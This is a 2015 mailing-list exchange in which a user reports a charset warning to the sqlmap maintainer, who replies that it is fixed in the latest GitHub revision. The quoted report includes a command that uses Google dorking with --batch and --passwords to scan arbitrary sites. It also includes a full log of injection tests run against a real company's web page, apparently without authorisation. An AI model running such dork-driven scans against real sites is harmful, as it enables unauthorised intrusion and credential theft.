Hi Daniel.
Thank you for your report. This should have been "patched" a long time ago.
Please update to the latest revision from our GitHub repository to have it up
to date (https://github.com/sqlmapproject/sqlmap/).
Kind regards,
Miroslav Stampar
On Sat, May 23, 2015 at 9:34 PM, Daniel Devereux <
danieldevereux1...@gmail.com> wrote:
> *Reporting*
> [20:21:53] [WARNING] unknown web page charset 'gbk2312'. Please report by
> e-mail to sqlmap-users@lists.sourceforge.net.
>
> *Command*
> sqlmap -g inurl:"showpro.asp?id=" --random-agent --batch --passwords
>
> *Terminal Readout*
> GET http://www.sh-sinap.com/en/Showpro.asp?id=6
> do you want to test this URL? [Y/n/q]
> > Y
> [20:21:30] [INFO] testing URL 'http://www.sh-sinap.com/en/Showpro.asp?id=6'
> [20:21:40] [INFO] testing connection to the target URL
> [20:21:46] [INFO] testing if the target URL is stable. This can take a
> couple of seconds
> [20:21:50] [INFO] target URL is stable
> [20:21:50] [INFO] testing if GET parameter 'id' is dynamic
> [20:21:51] [WARNING] GET parameter 'id' does not appear dynamic
> [20:21:52] [WARNING] heuristic (basic) test shows that GET parameter 'id'
> might not be injectable
> [20:21:52] [INFO] testing for SQL injection on GET parameter 'id'
> [20:21:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> *[20:21:53] [WARNING] unknown web page charset 'gbk2312'. Please report by
> e-mail to sqlmap-users@lists.sourceforge.net.*
> [20:21:53] [INFO] heuristics detected web page charset 'GB2312'
> [20:22:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
> clause'
> [20:22:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING
> clause'
> [20:22:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
> WHERE or HAVING clause'
> [20:22:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause
> (XMLType)'
> [20:22:46] [INFO] testing 'MySQL inline queries'
> [20:22:47] [INFO] testing 'PostgreSQL inline queries'
> [20:22:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
> [20:22:53] [INFO] testing 'Oracle inline queries'
> [20:22:55] [INFO] testing 'SQLite inline queries'
> [20:22:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
> [20:22:56] [CRITICAL] there is considerable lagging in connection
> response(s). Please use as high value for option '--time-sec' as possible
> (e.g. 10 or more)
> [20:23:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
> [20:23:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
> [20:23:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [20:23:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
> sqlmap got a 302 redirect to 'http://www.sh-sinap.com:80/en/Showpro.asp'.
> Do you want to follow? [Y/n] Y
> [20:23:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
> [20:23:47] [INFO] testing 'Oracle AND time-based blind'
> [20:24:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
> [20:25:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> [20:25:38] [WARNING] using unescaped version of the test because of zero
> knowledge of the back-end DBMS. You can try to explicitly set it using
> option '--dbms'
> [20:27:14] [CRITICAL] connection timed out to the target URL or proxy.
> sqlmap is going to retry the request
> [20:27:45] [CRITICAL] connection timed out to the target URL or proxy.
> sqlmap is going to retry the request
> [20:28:16] [CRITICAL] connection timed out to the target URL or proxy.
> sqlmap is going to retry the request
> [20:28:47] [CRITICAL] connection timed out to the target URL or proxy
> [20:29:10] [WARNING] user aborted during detection phase
> how do you want to proceed? [(S)kip current test/(e)nd detection
> phase/(n)ext parameter/(c)hange verbosity/(q)uit] n
> [20:29:22] [WARNING] GET parameter 'id' is not injectable
> [20:29:22] [ERROR] all tested parameters appear to be not injectable. Try
> to increase '--level'/'--risk' values to perform more tests. Also, you can
> try to rerun by providing either a valid value for option '--string' (or
> '--regexp'), skipping to the next URL
> [20:29:22] [WARNING] HTTP error codes detected during run:
> 500 (Internal Server Error) - 15 times
>
> Regards
> Dan
>
>
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm